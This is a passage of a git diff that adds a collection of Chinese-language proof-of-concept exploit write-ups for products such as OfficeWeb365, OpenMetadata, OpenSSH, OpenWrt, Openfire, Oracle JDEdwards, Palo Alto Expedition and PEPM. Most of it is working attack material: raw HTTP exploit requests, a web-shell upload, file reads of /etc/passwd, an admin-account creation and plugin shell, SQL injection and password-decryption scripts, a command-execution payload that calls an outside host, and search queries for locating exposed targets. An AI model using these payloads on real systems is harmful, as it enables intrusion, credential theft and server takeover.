+![1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636.png](./img/SE9ISR0qOEH1QGWX/1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636-273911.png)
+
+# 四、漏洞复现
+```plain
+POST /PW/SaveDraw?path=../../Content/img&idx=11.ashx HTTP/1.1
+Host: xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+data:image/png;base64,<%@ Language="C#" Class="Handler1" %>public class Handler1:System.Web.IHttpHandler
+{
+public void ProcessRequest(System.Web.HttpContext context)
+{
+System.Web.HttpResponse response = context.Response;
+response.Write(44 * 41);
+
+string filePath = context.Server.MapPath("/") + context.Request.Path;
+if (System.IO.File.Exists(filePath))
+{
+    System.IO.File.Delete(filePath);
+}
+}
+public bool IsReusable
+{
+get { return false; }
+}
+}///---
+```
+
+![1701180007393-aa52d3f6-1378-4a67-be24-c41634aa5bbd.png](./img/SE9ISR0qOEH1QGWX/1701180007393-aa52d3f6-1378-4a67-be24-c41634aa5bbd-536589.png)
+
+上传文件位置
+
+```plain
+/Content/img/UserDraw/drawPW11.ashx
+```
+
+![1701180072351-7554664d-c81e-48a1-b618-1218a79a505e.png](./img/SE9ISR0qOEH1QGWX/1701180072351-7554664d-c81e-48a1-b618-1218a79a505e-918752.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ws6vxp637qoycw2u>
\ No newline at end of file
diff --git a/OfficeWeb365wordfix存在任意读取漏洞.md b/OfficeWeb365wordfix存在任意读取漏洞.md
new file mode 100644
index 0000000..05f3131
--- /dev/null
+++ b/OfficeWeb365wordfix存在任意读取漏洞.md
@@ -0,0 +1,35 @@
+# OfficeWeb365 wordfix存在任意读取漏洞
+
+# 一、漏洞简介
+OfficeWeb365是西安大西信息科技有限公司开发的，专注于Office文档在线预览及PDF文档在线预览云服务，包括Microsoft Word文档在线预览、Excel表格在线预览、Powerpoint演示文档在线预览，WPS文字处理、WPS表格、WPS演示及Adobe PDF文档在线预览。广泛应用于OA办公系统、招聘网站、在线教育类网站，提高客户体验、增加产品竞争力。OfficeWeb365 /wordfix/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特的加密方式对payload进行加密，读取任意文件，获取服务器敏感信息，使系统处于极不安全的状态。
+
+# 二、影响版本
++ OfficeWeb365
+
+# 三、资产测绘
++ hunter：`app.name="OfficeWeb365"`
+
+![1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94.png](./img/1uGoArCQ7SLdakCW/1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94-682048.png)
+
++ 登录页面
+
+![1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636.png](./img/1uGoArCQ7SLdakCW/1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636-126524.png)
+
+# 四、漏洞复现
+```plain
+GET /wordfix/Index?f=YzovV2luZG93cy93aW4uaW5p HTTP/2
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1705936378459-10dffce2-93e7-4f55-aba9-2cef52979109.png](./img/1uGoArCQ7SLdakCW/1705936378459-10dffce2-93e7-4f55-aba9-2cef52979109-574409.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aywxwlh86qyygfg7>
\ No newline at end of file
diff --git a/OpenMetadataCVE-2024-28255命令执行漏洞.md b/OpenMetadataCVE-2024-28255命令执行漏洞.md
new file mode 100644
index 0000000..ffe589c
--- /dev/null
+++ b/OpenMetadataCVE-2024-28255命令执行漏洞.md
@@ -0,0 +1,32 @@
+# OpenMetadata CVE-2024-28255 命令执行漏洞
+
+# 一、漏洞简介
+OpenMetadata是一个用于数据治理的一体化平台，可以帮助我们发现，协作，并正确的获取数据。其提供了数据发现、数据血缘、数据质量、数据探查、数据治理和团队协作的一体化平台。它是发展最快的开源项目之一，拥有充满活力的社区，并被各行业垂直领域的众多公司采用。 OpenMetadata 由基于开放元数据标准和API 的集中式元数据存储提供支持，支持各种数据服务的连接器，可实现端到端元数据管理，让您可以自由地释放数据资产的价值。其condition接口存在CVE-2024-28255远程命令执行漏洞，可被攻击者接管服务器。
+
+# 二、影响版本
++ OpenMetadata
+
+# 三、资产测绘
++ fofa`icon_hash="733091897"`
++ 特征
+
+![1714216467929-a292c9d9-b9e2-44ff-9e43-9b167be9754a.png](./img/sj9XAYKGaL4hMSo3/1714216467929-a292c9d9-b9e2-44ff-9e43-9b167be9754a-611877.png)
+
+# 四、漏洞复现
+执行的命令需base64编码
+
+```plain
+GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22cGluZyB3YnJ6ZmtxamN5LmRncmgzLmNu%22))) HTTP/1.1
+Host: 
+User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Upgrade-Insecure-Requests: 1
+Connection: close
+```
+
+![1714216506355-e0737ddc-db9a-46fd-a0e8-7de860167cb0.png](./img/sj9XAYKGaL4hMSo3/1714216506355-e0737ddc-db9a-46fd-a0e8-7de860167cb0-461663.png)
+
+
+
+> 更新: 2024-04-28 16:11:56  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pz2p78tho923aukc>
\ No newline at end of file
diff --git a/OpenSSH-ProxyCommand命令注入漏洞-(CVE-2023-51385).md b/OpenSSH-ProxyCommand命令注入漏洞-(CVE-2023-51385).md
new file mode 100644
index 0000000..6367b27
--- /dev/null
+++ b/OpenSSH-ProxyCommand命令注入漏洞-(CVE-2023-51385).md
@@ -0,0 +1,23 @@
+## OpenSSH ProxyCommand命令注入漏洞 (CVE-2023-51385)
+SSHProxyCommand是一个用于代理SSH连接的广泛使用的功能，允许用户指定用于连接到服务器的自定义命令。该功能的参数中可能包含像%h（主机名）和%u（用户名）这样的标记。然而，当主机名来自不受信任的来源时，存在潜在的安全风险，因为可能构造恶意主机名，看起来像“恶意命令”，并通过反引号执行Shell命令。
+
+首先需要在~/.ssh/config增加如下
+```
+host *.example.com
+  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
+```
+.gitmodules文件语句中存在命令注入
+```
+url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
+```
+配置完成后,执行下面的指令触发
+```
+git clone https://github.com/wy876/CVE-2023-51385_test --recurse-submodules
+```
+如果成功执行将会在CVE-2023-51385_test目录下生成cve.txt文件
+
+![image](https://github.com/wy876/POC/assets/139549762/ab5f8d1a-2cd0-48af-8828-28447f809ad5)
+
+
+## 漏洞来源
+- https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html
diff --git a/OpenWrt任意文件读取.md b/OpenWrt任意文件读取.md
new file mode 100644
index 0000000..bc9aa64
--- /dev/null
+++ b/OpenWrt任意文件读取.md
@@ -0,0 +1,45 @@
+# OpenWrt任意文件读取
+
+## poc
+
+```javascript
+POST /cgi-bin/luci/admin/ubus?1733734260589 HTTP/1.1
+Host: 192.168.121.180
+Content-Length: 121
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
+Content-Type: application/json
+Accept: */*
+Origin: http://192.168.121.180
+Referer: http://192.168.121.180/cgi-bin/luci/
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: sysauth=305ade5ef36d6ced39e386729e8868b6
+Connection: close
+
+[{"jsonrpc":"2.0","id":0,"method":"call","params":["305ade5ef36d6ced39e386729e8868b6","file","list",{"path":"/www/"}]}]
+```
+
+```javascript
+POST /cgi-bin/luci/admin/ubus?1733734260589 HTTP/1.1
+Host: 192.168.121.180
+Content-Length: 127
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
+Content-Type: application/json
+Accept: */*
+Origin: http://192.168.121.180
+Referer: http://192.168.121.180/cgi-bin/luci/
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: sysauth=305ade5ef36d6ced39e386729e8868b6
+Connection: close
+
+[{"jsonrpc":"2.0","id":0,"method":"call","params":["305ade5ef36d6ced39e386729e8868b6","file","read",{"path":"/etc/passwd"}]}]
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112142249.webp)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/nRSmiZy5JMt-0K1sSeUexw
\ No newline at end of file
diff --git a/Openfire身份认证绕过漏洞&getshell(CVE-2023-32315).md b/Openfire身份认证绕过漏洞&getshell(CVE-2023-32315).md
new file mode 100644
index 0000000..49b1267
--- /dev/null
+++ b/Openfire身份认证绕过漏洞&getshell(CVE-2023-32315).md
@@ -0,0 +1,82 @@
+# Openfire身份认证绕过漏洞&getshell(CVE-2023-32315)
+
+# 一、漏洞简介
+      Openfire是免费的、开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器。Openfire安装和使用都非常简单，并利用Web进行管理。单台服务器甚至可支持上万并发用户。Openfire的管理控制台是一个基于 Web 的应用程序，被发现可以使用路径遍历的方式绕过权限校验。成功利用后，未经身份验证的用户可以访问 Openfire 管理控制台中的后台页面。同时由于Openfire管理控制台的后台提供了安装插件的功能，所以攻击者可以通过安装恶意插件达成远程代码执行的效果。   
+
+# 二、影响版本
++ 3.10.0 <= Openfire < 4.6.8
++ 4.7.0 <= Openfire 4.7.x < 4.7.5
+
+# 三、资产测绘
++ hunter`app.name="Openfire"`![1692201143517-80f3a4d3-bec2-4829-876a-090c26f9d7e0.png](./img/TunDJjI7qkurQ1y9/1692201143517-80f3a4d3-bec2-4829-876a-090c26f9d7e0-665458.png)
++ 登录页面
+
+![1692201198433-2be7c1b6-5b9c-4f5f-9797-91444ec564ad.png](./img/TunDJjI7qkurQ1y9/1692201198433-2be7c1b6-5b9c-4f5f-9797-91444ec564ad-037854.png)
+
+# 四、漏洞复现
+## POC
+当访问poc出现如下情况表示存在漏洞
+
+```plain
+/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
+```
+
+![1692201286860-3786d6ee-869c-4059-b250-141dd492092e.png](./img/TunDJjI7qkurQ1y9/1692201286860-3786d6ee-869c-4059-b250-141dd492092e-360287.png)
+
+EXP
+
+1. 获取`JSESSIONID`和`csrftoken`
+
+```plain
+GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1692201403607-088e873f-8b9d-4e95-bbdc-22591b30bb7c.png](./img/TunDJjI7qkurQ1y9/1692201403607-088e873f-8b9d-4e95-bbdc-22591b30bb7c-863460.png)
+
+3. 通过上一步回去到的`JSESSIONID`和`csrftoken`替换下列数据包中相应参数，构造用户
+
+```plain
+GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=qvq9l8fyflxMuwP&username=test123&name=&email=&password=test123&passwordConfirm=test123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=node0m00xukgw3om052y56u7ppl451582.node0; csrf=qvq9l8fyflxMuwP
+Upgrade-Insecure-Requests: 1
+```
+
+![1692201513050-a62bdc73-e575-464c-80f8-76e6d088d6be.png](./img/TunDJjI7qkurQ1y9/1692201513050-a62bdc73-e575-464c-80f8-76e6d088d6be-661254.png)
+
+4. 使用创建的账户`test123/test123`,登录
+
+![1692201674481-2f2c2a1d-6249-439e-a4c0-7092b17aa047.png](./img/TunDJjI7qkurQ1y9/1692201674481-2f2c2a1d-6249-439e-a4c0-7092b17aa047-414561.png)
+
+5. 在插件处上传利用插件getsgell
+
+插件下载地址：[https://download.csdn.net/download/qq_33331244/88224220](https://download.csdn.net/download/qq_33331244/88224220)
+
+![1692202063603-a440bf6b-8bbb-4e44-b742-732bd84bb9e7.png](./img/TunDJjI7qkurQ1y9/1692202063603-a440bf6b-8bbb-4e44-b742-732bd84bb9e7-926645.png)
+
+6. 插件上传成功
+
+![1692202109870-8ee54e40-3ef4-459f-81d5-3f5570cbedba.png](./img/TunDJjI7qkurQ1y9/1692202109870-8ee54e40-3ef4-459f-81d5-3f5570cbedba-838296.png)
+
+7. 进入服务器->服务器设置->shellplugin，输入密码123，即可实现rce
+
+![1692202180669-e5ebf2c2-650b-4000-b631-60a70bc1ef45.png](./img/TunDJjI7qkurQ1y9/1692202180669-e5ebf2c2-650b-4000-b631-60a70bc1ef45-199143.png)
+
+![1692202195272-898e77a1-37c4-43cd-97f1-5c3be719f144.png](./img/TunDJjI7qkurQ1y9/1692202195272-898e77a1-37c4-43cd-97f1-5c3be719f144-956700.png)
+
+
+
+> 更新: 2024-02-29 23:57:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xq7trzegk6ecseyg>
\ No newline at end of file
diff --git a/Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏.md b/Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏.md
new file mode 100644
index 0000000..21ebc47
--- /dev/null
+++ b/Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏.md
@@ -0,0 +1,122 @@
+# Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏
+
+Oracle JDEdwards EnterpriseOne Tools未授权获取管理员密码泄漏
+
+## shodan
+
+```yaml
+port:8999 product:"Oracle WebLogic Server"
+```
+
+## poc
+
+```java
+http://ip:8999/manage/fileDownloader?sec=1
+```
+
+![image-20240822225543738](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408222255786.png)
+
+```python
+import base64
+import argparse
+import subprocess
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import unpad
+
+def main():
+    # Display ASCII art
+    print("""
+       ______   ______    ___  ___  ___  ___      ___ ________ ____
+      / ___/ | / / __/___|_  |/ _ \|_  |/ _ \____|_  /_  /_  /|_  /
+     / /__ | |/ / _//___/ __// // / __// // /___/ __/ / //_ <_/_ < 
+     \___/ |___/___/   /____/\___/____/\___/   /____//_/____/____/ 
+    """)
+
+    # Parse command-line arguments
+    parser = argparse.ArgumentParser(description='Decrypt a given string.')
+    parser.add_argument('--string', help='The string to be decrypted')
+    parser.add_argument('--target', help='The target URL to fetch the string from')
+    args = parser.parse_args()
+
+    if args.target:
+        # Fetch the response from the target URL
+        response = fetch_target_string_with_curl(args.target)
+        if response:
+            input_str = response
+            print(f"Fetched string from target: {input_str}")
+        else:
+            print("No valid string found in the response.")
+            return
+    elif args.string:
+        input_str = args.string
+    else:
+        print("You must provide either --string or --target.")
+        return
+
+    # Decrypt the string
+    array_of_bytes = jde_decipher(input_str.encode("UTF-8"))
+    print("Decrypted string:", array_of_bytes.decode("UTF-8"))
+
+def fetch_target_string_with_curl(target_url):
+    try:
+        # Use curl to fetch the target URL with SSL verification disabled
+        result = subprocess.run(['curl', '-k', target_url], capture_output=True, text=True)
+        if result.returncode == 0:
+            response_text = result.stdout.strip()
+            print("Response received:")
+            print(response_text)  # Print for debugging
+            return response_text
+        else:
+            print(f"curl failed with return code {result.returncode}")
+            return None
+    except Exception as e:
+        print(f"Failed to fetch from target using curl: {e}")
+        return None
+
+def jde_decipher(param_array_of_bytes):
+    array_of_bytes_1 = show_buffer(param_array_of_bytes)
+    array_of_bytes_2 = base64.b64decode(array_of_bytes_1)
+    return array_of_bytes_2
+
+def show_buffer(param_array_of_bytes):
+    array_of_bytes_1 = bytearray(len(param_array_of_bytes) // 2)
+    for j in range(len(array_of_bytes_1)):
+        i = 2 * j
+        array_of_bytes_1[j] = ((param_array_of_bytes[i] - 65) << 4) + (param_array_of_bytes[i + 1] - 65)
+
+    if array_of_bytes_1[0] != 2:
+        raise Exception("Invalid version for net showBuffer")
+
+    array_of_bytes_2 = bytearray(16)
+    array_of_bytes_3 = bytearray(16)
+    gen_keys(array_of_bytes_2, array_of_bytes_3, array_of_bytes_1[3])
+
+    cipher = AES.new(array_of_bytes_2, AES.MODE_CBC, iv=array_of_bytes_3)
+    array_of_bytes_4 = unpad(cipher.decrypt(bytes(array_of_bytes_1[6:])), AES.block_size)
+
+    return array_of_bytes_4
+
+def gen_keys(param_array_of_bytes_1, param_array_of_bytes_2, param_byte):
+    array_of_bytes_1 = bytearray([65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46])
+    array_of_bytes_2 = bytearray([107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, 127, 77, 54])
+    array_of_bytes_3 = bytearray([36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56])
+
+    j = param_byte >> 4
+    k = param_byte & 0xF
+    m = array_of_bytes_3[j]
+    for i in range(16):
+        param_array_of_bytes_1[i] = array_of_bytes_1[i] ^ m
+
+    m = array_of_bytes_3[k]
+    for i in range(16):
+        param_array_of_bytes_2[i] = array_of_bytes_2[i] ^ m
+
+if __name__ == "__main__":
+    main()
+```
+
+```
+python3 poc.py --string ACHCJKFKHCJKKKJJIBBOCDPIHOEJIICHDGHGJEBABEAG
+```
+
+![image-20240822225618589](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408222256627.png)
\ No newline at end of file
diff --git a/OracleJDEdwardsEnterpriseOneTools存在未授权获取管理员密码漏洞.md b/OracleJDEdwardsEnterpriseOneTools存在未授权获取管理员密码漏洞.md
new file mode 100644
index 0000000..0c5e5f4
--- /dev/null
+++ b/OracleJDEdwardsEnterpriseOneTools存在未授权获取管理员密码漏洞.md
@@ -0,0 +1,130 @@
+# Oracle JDEdwards EnterpriseOne Tools存在未授权获取管理员密码漏洞
+
+## 一、漏洞描述
+Oracle JDEdwards EnterpriseOne Tools存在未授权获取管理员密码漏洞
+
+## 二、影响版本
++ 向日葵个人版 for Windows <=11.0.0.33162版本
++ 向日葵简约版 <= V1.0.1.43315（2021.12）
+
+## 三、漏洞测绘
+```java
+port:8999 product:"Oracle WebLogic Server"
+```
+
+![1724335620619-317416d9-24aa-4545-bad4-a3067a469dc3.png](./img/ijf-qz3AGTo6YYJz/1724335620619-317416d9-24aa-4545-bad4-a3067a469dc3-184659.png)
+
+## 四、漏洞复现
+![1724335643682-e9e0b518-1460-4da8-8273-2df3d3a1a767.png](./img/ijf-qz3AGTo6YYJz/1724335643682-e9e0b518-1460-4da8-8273-2df3d3a1a767-754624.png)
+
+使用下面解密脚本解密
+
+```java
+python3 poc.py --string ACHCJKFKHCJKKKJJIBBOCDPIHOEJIICHDGHGJEBABEAG
+```
+
+![1724335765028-42f80ff5-85e2-4f31-a6f9-70dfbbb2151c.png](./img/ijf-qz3AGTo6YYJz/1724335765028-42f80ff5-85e2-4f31-a6f9-70dfbbb2151c-572268.png)
+
+```java
+import base64
+import argparse
+import subprocess
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import unpad
+
+def main():
+    # Display ASCII art
+    print("""
+       ______   ______    ___  ___  ___  ___      ___ ________ ____
+      / ___/ | / / __/___|_  |/ _ \|_  |/ _ \____|_  /_  /_  /|_  /
+     / /__ | |/ / _//___/ __// // / __// // /___/ __/ / //_ <_/_ < 
+     \___/ |___/___/   /____/\___/____/\___/   /____//_/____/____/ 
+    """)
+
+    # Parse command-line arguments
+    parser = argparse.ArgumentParser(description='Decrypt a given string.')
+    parser.add_argument('--string', help='The string to be decrypted')
+    parser.add_argument('--target', help='The target URL to fetch the string from')
+    args = parser.parse_args()
+
+    if args.target:
+        # Fetch the response from the target URL
+        response = fetch_target_string_with_curl(args.target)
+        if response:
+            input_str = response
+            print(f"Fetched string from target: {input_str}")
+        else:
+            print("No valid string found in the response.")
+            return
+    elif args.string:
+        input_str = args.string
+    else:
+        print("You must provide either --string or --target.")
+        return
+
+    # Decrypt the string
+    array_of_bytes = jde_decipher(input_str.encode("UTF-8"))
+    print("Decrypted string:", array_of_bytes.decode("UTF-8"))
+
+def fetch_target_string_with_curl(target_url):
+    try:
+        # Use curl to fetch the target URL with SSL verification disabled
+        result = subprocess.run(['curl', '-k', target_url], capture_output=True, text=True)
+        if result.returncode == 0:
+            response_text = result.stdout.strip()
+            print("Response received:")
+            print(response_text)  # Print for debugging
+            return response_text
+        else:
+            print(f"curl failed with return code {result.returncode}")
+            return None
+    except Exception as e:
+        print(f"Failed to fetch from target using curl: {e}")
+        return None
+
+def jde_decipher(param_array_of_bytes):
+    array_of_bytes_1 = show_buffer(param_array_of_bytes)
+    array_of_bytes_2 = base64.b64decode(array_of_bytes_1)
+    return array_of_bytes_2
+
+def show_buffer(param_array_of_bytes):
+    array_of_bytes_1 = bytearray(len(param_array_of_bytes) // 2)
+    for j in range(len(array_of_bytes_1)):
+        i = 2 * j
+        array_of_bytes_1[j] = ((param_array_of_bytes[i] - 65) << 4) + (param_array_of_bytes[i + 1] - 65)
+
+    if array_of_bytes_1[0] != 2:
+        raise Exception("Invalid version for net showBuffer")
+
+    array_of_bytes_2 = bytearray(16)
+    array_of_bytes_3 = bytearray(16)
+    gen_keys(array_of_bytes_2, array_of_bytes_3, array_of_bytes_1[3])
+
+    cipher = AES.new(array_of_bytes_2, AES.MODE_CBC, iv=array_of_bytes_3)
+    array_of_bytes_4 = unpad(cipher.decrypt(bytes(array_of_bytes_1[6:])), AES.block_size)
+
+    return array_of_bytes_4
+
+def gen_keys(param_array_of_bytes_1, param_array_of_bytes_2, param_byte):
+    array_of_bytes_1 = bytearray([65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46])
+    array_of_bytes_2 = bytearray([107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, 127, 77, 54])
+    array_of_bytes_3 = bytearray([36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56])
+
+    j = param_byte >> 4
+    k = param_byte & 0xF
+    m = array_of_bytes_3[j]
+    for i in range(16):
+        param_array_of_bytes_1[i] = array_of_bytes_1[i] ^ m
+
+    m = array_of_bytes_3[k]
+    for i in range(16):
+        param_array_of_bytes_2[i] = array_of_bytes_2[i] ^ m
+
+if __name__ == "__main__":
+    main()
+```
+
+
+
+> 更新: 2024-09-05 23:27:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pmvkhnz91qoo3axw>
\ No newline at end of file
diff --git a/PAN未授权SQL注入漏洞复现(CVE-2024-9465).md b/PAN未授权SQL注入漏洞复现(CVE-2024-9465).md
new file mode 100644
index 0000000..aab8842
--- /dev/null
+++ b/PAN未授权SQL注入漏洞复现(CVE-2024-9465).md
@@ -0,0 +1,87 @@
+# PAN未授权SQL注入漏洞复现(CVE-2024-9465)
+
+Palo Alto Networks Expedition中存在的一个SQL注入漏洞POC及漏洞细节已经公开,该漏洞允许未经验证的攻击者获取Expedition数据库内容,例如密码哈希、用户名、设备配置和设备API密钥,利用这一点,攻击者还可以在Expedition 系统上创建和读取任意文件。
+
+### 影响范围
+
+Palo Alto Networks Expedition < 1.2.96
+
+## fofa
+
+```javascript
+title="Expedition Project"
+```
+
+## poc
+
+```javascript
+POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+
+action=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test)
+```
+
+![image-20241012114501096](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121145181.png)
+
+## python脚本
+
+```python
+#!/usr/bin/python3
+import argparse
+import requests
+import urllib3
+import sys
+import time
+urllib3.disable_warnings()
+
+
+def create_checkpoint_table(url: str):
+    print(f'[*] Creating Checkpoint database table...')
+    data = {'action': 'get',
+            'type': 'existing_ruleBases',
+            'project': 'pandbRBAC',
+            }
+    r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)
+    if r.status_code == 200 and 'ruleBasesNames' in r.text:
+        print(f'[*] Successfully created the database table')
+        return
+
+    print(f'[-] Unexpected response creating table: {r.status_code}:{r.text}')
+    sys.exit(1)
+
+
+def inject_checkpoint_query(url: str):
+    start_time = time.time()
+    print(f'[*] Injecting 10 second sleep payload into database query...')
+    data = {'action': 'import',
+            'type': 'test',
+            'project': 'pandbRBAC',
+            'signatureid': '1 AND (SELECT 1234 FROM (SELECT(SLEEP(10)))horizon3)',
+            }
+    r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)
+    execution_time = time.time() - start_time
+    if r.status_code == 200 and execution_time > 9 and execution_time < 15:
+        print(f'[*] Successfully sent injection payload!')
+        print(f'[+] Target is vulnerable, request took {execution_time} seconds')
+        return
+
+    print(f'[-] Unexpected response sending injection payload: {r.status_code}:{r.text}')
+    sys.exit(1)
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-u', '--url', help='The URL of the target', type=str, required=True)
+    args = parser.parse_args()
+
+    create_checkpoint_table(args.url)
+    inject_checkpoint_query(args.url)
+
+```
+
+
+
+## 漏洞来源
+
+- https://github.com/horizon3ai/CVE-2024-9465
\ No newline at end of file
diff --git a/PEPM系统Cookie请求头存在远程代码执行漏洞.md b/PEPM系统Cookie请求头存在远程代码执行漏洞.md
new file mode 100644
index 0000000..ae568a6
--- /dev/null
+++ b/PEPM系统Cookie请求头存在远程代码执行漏洞.md
@@ -0,0 +1,30 @@
+# PEPM系统Cookie请求头存在远程代码执行漏洞
+
+# 一、漏洞简介
+PEPM系统Cookie请求头存在远程代码执行漏洞
+
+# 二、影响版本
++ PEPM
+
+# 三、资产测绘
+```plain
+header="pepm"
+```
+
+![1722876330531-484a89d0-0030-4c38-8bd0-27e97936adc2.png](./img/tlp0y6fKN60Y2V4W/1722876330531-484a89d0-0030-4c38-8bd0-27e97936adc2-803339.png)
+
+# 四、漏洞复现
+```plain
+GET / HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
+Cookie: auth=a%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A45%3A%221%29%7B%7D%7D%7D%3B%20ob_clean%28%29%3Bsystem%28%27whoami%27%29%3Bdie%28%29%3B%20%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7D%7D%7D
+Connection: close
+```
+
+![1722876371652-4bd33bb8-1302-438d-83bd-ef957bef3490.png](./img/tlp0y6fKN60Y2V4W/1722876371652-4bd33bb8-1302-438d-83bd-ef957bef3490-729318.png)
+
+
+
+> 更新: 2024-08-12 17:15:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tqiapo8b4781kprv>
\ No newline at end of file
diff --git a/PHP-8.1.0-devzerodium后门命令执行漏洞.md b/PHP-8.1.0-devzerodium后门命令执行漏洞.md
new file mode 100644
index 0000000..847419e
